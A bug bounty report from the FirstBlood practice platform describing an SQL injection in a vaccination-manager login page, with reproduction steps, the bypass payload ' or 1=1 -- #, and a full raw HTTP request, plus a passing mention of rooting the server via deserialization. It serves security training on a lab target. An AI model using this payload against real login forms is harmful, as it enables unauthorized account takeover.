FirstBlood-#914The login form for Vaccination Manager is vulnerable to SQL injection
This issue was discovered on FirstBlood v2

On 2021-10-30, vigilante Level 4 reported:

Summary:

The vaccination-manager login form is vulnerable to SQL injection.

After rooting the server through deserialization, I've searched through the vaccination-manager directory and found /vaccination-manager/login.php which was easy to exploit.

Steps to Reproduce:

  1. Navigate to /vaccination-manager/login.php
  2. Enter username "admin" and password ' or 1=1 -- #
  3. You'll be logged in as admin
POST /vaccination-manager/login.php HTTP/1.1
Host: 71db6da74f3c-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a1591376de74895e99a25819f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: https://71db6da74f3c-vigilante.a.firstbloodhackers.com
Referer: https://71db6da74f3c-vigilante.a.firstbloodhackers.com/vaccination-manager/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin&password=%27+or+1%3D1+--+%23

Supporting Material:

Impact

Someone without the admin's password can still log in due to SQL injection.

P1 CRITICAL

Endpoint: /vaccination-manager/login.php

Parameter: password

Payload: ' or 1=1 -- #

FirstBlood ID: 30
Vulnerability Type: SQL Injection

There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.